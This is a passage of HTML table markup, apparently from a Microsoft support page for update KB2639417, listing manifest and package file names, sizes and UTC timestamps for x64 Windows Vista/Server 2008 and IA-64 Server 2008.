class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">6,543</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:00</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_c167fb4d416ae4e2fce1560f36235fda_31bf3856ad364e35_6.0.6002.18544_none_27280981728ba91e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_c1a5d0737a69a192855420416ff20a02_31bf3856ad364e35_6.0.6002.22745_none_f950ee30ac983cc5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_16d157ce50274e72.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">6,559</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:53</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_175bf6c9694404ba.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">6,559</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,611</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,552</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,451</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,388</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,451</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,388</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client_2_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,693</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client_2~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,720</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_client~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,454</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_1_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,689</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_1~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,716</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,426</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_1_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,693</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_1~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,720</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,454</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,044</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_212602208488106d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_21b0a11b9da4c6b5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_3c18e2254f71b97d54647447077058b8_31bf3856ad364e35_6.0.6002.18544_none_9ecc51e4eb6105d8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_abe3beb6ed278ac414180725ed4b99c3_31bf3856ad364e35_6.0.6002.22745_none_57a3ec69395f6964.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_bab4604097c7e638.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">6,551</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:03</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_bb3eff3bb0e49c80.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">6,551</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:30</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,281</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,212</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,281</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,212</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_1_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,521</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_1~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,544</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td 